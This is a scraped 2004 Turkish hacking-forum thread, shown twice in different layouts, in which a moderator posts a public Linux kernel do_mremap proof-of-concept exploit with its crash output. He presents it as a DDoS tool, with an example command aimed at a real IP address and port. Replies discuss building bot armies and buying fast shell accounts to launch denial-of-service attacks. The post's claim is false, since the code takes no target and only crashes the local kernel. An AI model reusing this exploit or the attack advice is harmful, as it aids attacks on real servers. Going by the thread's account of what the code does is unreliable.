Ddos Atak

TARIK · 03-12-2004, 14:55

Bazi İnsanların Forum üzerinde olumsuz yazılarını görünce sildiğim bir konuyu tekrar yazıyorum. Silmekte hata yaptığımı anladım çünkü o insanlar beni değil kendilerini küçük düşürdüler...

Başlıyoruz

Shell\'e Bağlandıktan Sonra

pico mremap_poc_2.c

KOD Başlıyor

$ gcc -W -Wall mremap_poc_2.c && ./a.out
mmap: Cannot allocate memory
created ~65530 VMAs
now mremapping 0x3FFE5000 at 0x3FFE1000
Segmentation fault

$ dmesg | tail -n 16
kernel BUG at mmap.c:1194!
invalid operand: 0000
CPU: 0
EIP: 0010:[<c01239b5>] Not tainted
EFLAGS: 00010287
eax: 3ffe2000 ebx: ce189f80 ecx: ce189f38 edx: ce189f20
esi: ce189fc4 edi: ce189f04 ebp: ce189ec0 esp: cf101f44
ds: 0018 es: 0018 ss: 0018
Process a.out (pid: 5371, stackpage=cf101000)
Stack: ce189f80 ce189fc4 ce189f04 3ffe1000 3ffe1000 c012873f cf1b66e0 c01287c7
cf1b66e0 ce189ec0 cf100000 00001000 cf1b66fc ffff0001 cf1b66e0 00000000
c339df1c ce189ec0 cf100000 fffffff4 ce189e60 c0128896 3ffe5000 00001000
Call Trace: [<c012873f>] [<c01287c7>] [<c0128896>] [<c01086b3>]

Code: 0f 0b aa 04 21 f9 2d c0 8b 7c 24 10 8b 74 24 14 8b 5c 24 18

$ cat mremap_poc_2.c

/*
* Proof-of-concept exploit code for do_mremap() #2
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=220

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

#define VMA_SIZE 0x00003000

int main( void )
{
int i, ret;
void *base0;
void *base1;

i = 0;

while( 1 )
{
i++;

ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

if( ret == -1 )
{
perror( \"mmap\" );
break;
}

base0 = base1;
base1 = (void *) ret;
}

printf( \"created ~%d VMAs\\n\", i );

base0 += 0x1000;
base1 += 0x1000;

printf( \"now mremapping 0x%08X at 0x%08X\\n\",
(int) base1, (int) base0 );

real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );

printf( \"kernel may not be vulnerable\\n\" );

return( 0 );
}

KOD Bitti

gcc -W -Wall mremap_poc_2.c

YAzın. Artık herşey Hazır Saldırmak İçin

./a.out IP PORT

Örnek
./a.out 66.90.87.141 6667

Saldırı Artık Başladı...

NorthWind · 03-12-2004, 16:56

kac shellden saldiriyorsun?

SpeedyDNA · 03-12-2004, 17:24

kaç shell e kurarsan o kdr da

system admini shelli kapatır bunu uygularsan

ddos için sub bot yapmak daha akıl karı tek shell zaten pek ise yaramaz

noyan · 03-12-2004, 18:22

kimse kimseyi kucuk dusurmedi en iyi saldiri yontemi dersen solenecek sozler onlardi baska soz beklemenin anlami yoktu silmeseydin herkes okusaydi o zaman kim kime rezil oldu.

Stonkeep · 04-12-2004, 00:48

benim yazdiklarimda gitmis :S

NorthWind · 04-12-2004, 04:51

100Mbit degilse server bosa saldirirsin o tek shelle... anca dialuplar yada 128kb lar iner. arti root olmalisin...
en iyisi direk bot ordusu kurmak...

Stonkeep · 04-12-2004, 05:38

100mbit le baya bi yer indirirsin zaten.
ben 2mbit kablo ile 256dsl indirebiliyorum. Ancak dedigin gibi en iyisi bot ordusu, zaten ddosun manasi ole olunca cikiyor. Binlerce botla bir saldiri kimse dayanamiyor

TARIK · 04-12-2004, 09:41

Alıntı:

kimse kimseyi kucuk dusurmedi en iyi saldiri yontemi dersen solenecek sozler onlardi baska soz beklemenin anlami yoktu silmeseydin herkes okusaydi o zaman kim kime rezil oldu.

En iyi saldırıyı sen biliyorsan sen yazacaksın. benim bildiğim en iyi saldırı DDos\'dur

NorthWind · 04-12-2004, 09:56

Distributed DOS adi ustunde.

04-12-2004, 12:32

Saçma

Yapabildiğin birşeyi yazda muhalefet olmayalım yazdığın birşeyide silmene gerek yok bence

Doğruluğuna inanmıyorsan yazmıyacaksın inanıyorsanda arkasında duracaksın

04-12-2004, 13:02

Tarık eline sağlık güzel yazmışsın , ama shell hesabı olmayan yada bunları kullanamayacak arkadaşlarda var , onlarada Denyo 4 ü tavsiye ediyorum...Web hackte adresleri verdim ..

TARIK · 04-12-2004, 13:48

Aslında beleş shell host veren yabancı yerler var ama onlar ddos yaptırır mı bilmiyorum hatta adreslerinide tam hatırlamıyorum googlede free shell acount yazıp aramıştım bir ara bir sürü adres vardı

NorthWind · 04-12-2004, 14:24

ucretsiz yerlerden birsey yapamazsin. hizli hatlara ucretsiz shell verilicegini hic sanmiyorum...

TARIK · 04-12-2004, 14:26

Başka çare yok o zaman shell alacaksın saldırmayı bu kadar koyduysan kafana 10 milyona göz yumacaksın hatta bir ara 5 milyonada vardı. Bir öğretmenin firması vardı 3 milyondu ama onu tam olarak bilmiyorum... kapamış olabilir

NorthWind · 04-12-2004, 18:45

256 kb hattir onlar. 10mbitlik shell bulun bana 10 milyona hemen aliyim

03-12-2004, 14:55	#1
TARIK Super Moderator Kayıt Tarihi: Nov 2004 Üye numarası: #17 Yer: Xonguldak Mesaj sayısı: 4,112 Karma etkisi: 7675 Karma: 766352	Ddos Atak Bazi İnsanların Forum üzerinde olumsuz yazılarını görünce sildiğim bir konuyu tekrar yazıyorum. Silmekte hata yaptığımı anladım çünkü o insanlar beni değil kendilerini küçük düşürdüler... Başlıyoruz Shell\'e Bağlandıktan Sonra pico mremap_poc_2.c KOD Başlıyor $ gcc -W -Wall mremap_poc_2.c && ./a.out mmap: Cannot allocate memory created ~65530 VMAs now mremapping 0x3FFE5000 at 0x3FFE1000 Segmentation fault $ dmesg \| tail -n 16 kernel BUG at mmap.c:1194! invalid operand: 0000 CPU: 0 EIP: 0010:[<c01239b5>] Not tainted EFLAGS: 00010287 eax: 3ffe2000 ebx: ce189f80 ecx: ce189f38 edx: ce189f20 esi: ce189fc4 edi: ce189f04 ebp: ce189ec0 esp: cf101f44 ds: 0018 es: 0018 ss: 0018 Process a.out (pid: 5371, stackpage=cf101000) Stack: ce189f80 ce189fc4 ce189f04 3ffe1000 3ffe1000 c012873f cf1b66e0 c01287c7 cf1b66e0 ce189ec0 cf100000 00001000 cf1b66fc ffff0001 cf1b66e0 00000000 c339df1c ce189ec0 cf100000 fffffff4 ce189e60 c0128896 3ffe5000 00001000 Call Trace: [<c012873f>] [<c01287c7>] [<c0128896>] [<c01086b3>] Code: 0f 0b aa 04 21 f9 2d c0 8b 7c 24 10 8b 74 24 14 8b 5c 24 18 $ cat mremap_poc_2.c /* * Proof-of-concept exploit code for do_mremap() #2 * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA / #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE \| MREMAP_FIXED Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=220 #define __NR_real_mremap __NR_mremap static inline _syscall5( void , real_mremap, void , old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void , new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void base0; void base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void )( i (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ \| PROT_WRITE, MAP_PRIVATE \| MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( \"mmap\" ); break; } base0 = base1; base1 = (void ) ret; } printf( \"created ~%d VMAs\\n\", i ); base0 += 0x1000; base1 += 0x1000; printf( \"now mremapping 0x%08X at 0x%08X\\n\", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( \"kernel may not be vulnerable\\n\" ); return( 0 ); } KOD Bitti* gcc -W -Wall mremap_poc_2.c YAzın. Artık herşey Hazır Saldırmak İçin ./a.out IP PORT Örnek ./a.out 66.90.87.141 6667 Saldırı Artık Başladı...

04-12-2004, 12:32	#10
Shadows Misafir Üye Üye numarası: # Mesaj sayısı: n/a Karma:	S A Ç M A Saçma Yapabildiğin birşeyi yazda muhalefet olmayalım yazdığın birşeyide silmene gerek yok bence Doğruluğuna inanmıyorsan yazmıyacaksın inanıyorsanda arkasında duracaksın

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

03-12-2004, 16:56	#2
NorthWind Banned Kayıt Tarihi: Dec 2004 Üye numarası: #461 Yer: Australia Mesaj sayısı: 359 Karma etkisi: 0 Karma: 10	kac shellden saldiriyorsun?

03-12-2004, 17:24	#3
SpeedyDNA Daimi Üye Kayıt Tarihi: Dec 2004 Üye numarası: #463 Yer: Ankara Mesaj sayısı: 616 Karma etkisi: 10 Karma: 274	kaç shell e kurarsan o kdr da system admini shelli kapatır bunu uygularsan ddos için sub bot yapmak daha akıl karı tek shell zaten pek ise yaramaz

03-12-2004, 18:22	#4
noyan Cool Çırak Kayıt Tarihi: Nov 2004 Üye numarası: #299 Mesaj sayısı: 35 Karma etkisi: 0 Karma: 19	kimse kimseyi kucuk dusurmedi en iyi saldiri yontemi dersen solenecek sozler onlardi baska soz beklemenin anlami yoktu silmeseydin herkes okusaydi o zaman kim kime rezil oldu.

04-12-2004, 00:48	#5
Stonkeep Hızlı Çırak Kayıt Tarihi: Nov 2004 Üye numarası: #340 Yer: Toronto - Istanbul Mesaj sayısı: 79 Karma etkisi: 8 Karma: 22	benim yazdiklarimda gitmis :S

04-12-2004, 04:51	#6
NorthWind Banned Kayıt Tarihi: Dec 2004 Üye numarası: #461 Yer: Australia Mesaj sayısı: 359 Karma etkisi: 0 Karma: 10	100Mbit degilse server bosa saldirirsin o tek shelle... anca dialuplar yada 128kb lar iner. arti root olmalisin... en iyisi direk bot ordusu kurmak...

04-12-2004, 05:38	#7
Stonkeep Hızlı Çırak Kayıt Tarihi: Nov 2004 Üye numarası: #340 Yer: Toronto - Istanbul Mesaj sayısı: 79 Karma etkisi: 8 Karma: 22	100mbit le baya bi yer indirirsin zaten. ben 2mbit kablo ile 256dsl indirebiliyorum. Ancak dedigin gibi en iyisi bot ordusu, zaten ddosun manasi ole olunca cikiyor. Binlerce botla bir saldiri kimse dayanamiyor

04-12-2004, 09:56	#9
NorthWind Banned Kayıt Tarihi: Dec 2004 Üye numarası: #461 Yer: Australia Mesaj sayısı: 359 Karma etkisi: 0 Karma: 10	Distributed DOS adi ustunde.

04-12-2004, 13:02	#11
decameron Misafir Üye Üye numarası: # Mesaj sayısı: n/a Karma:	Tarık eline sağlık güzel yazmışsın , ama shell hesabı olmayan yada bunları kullanamayacak arkadaşlarda var , onlarada Denyo 4 ü tavsiye ediyorum...Web hackte adresleri verdim ..

04-12-2004, 13:48	#12
TARIK Super Moderator Kayıt Tarihi: Nov 2004 Üye numarası: #17 Yer: Xonguldak Mesaj sayısı: 4,112 Karma etkisi: 7675 Karma: 766352	Aslında beleş shell host veren yabancı yerler var ama onlar ddos yaptırır mı bilmiyorum hatta adreslerinide tam hatırlamıyorum googlede free shell acount yazıp aramıştım bir ara bir sürü adres vardı

04-12-2004, 14:24	#13
NorthWind Banned Kayıt Tarihi: Dec 2004 Üye numarası: #461 Yer: Australia Mesaj sayısı: 359 Karma etkisi: 0 Karma: 10	ucretsiz yerlerden birsey yapamazsin. hizli hatlara ucretsiz shell verilicegini hic sanmiyorum...

04-12-2004, 14:26	#14
TARIK Super Moderator Kayıt Tarihi: Nov 2004 Üye numarası: #17 Yer: Xonguldak Mesaj sayısı: 4,112 Karma etkisi: 7675 Karma: 766352	Başka çare yok o zaman shell alacaksın saldırmayı bu kadar koyduysan kafana 10 milyona göz yumacaksın hatta bir ara 5 milyonada vardı. Bir öğretmenin firması vardı 3 milyondu ama onu tam olarak bilmiyorum... kapamış olabilir

04-12-2004, 18:45	#15
NorthWind Banned Kayıt Tarihi: Dec 2004 Üye numarası: #461 Yer: Australia Mesaj sayısı: 359 Karma etkisi: 0 Karma: 10	256 kb hattir onlar. 10mbitlik shell bulun bana 10 milyona hemen aliyim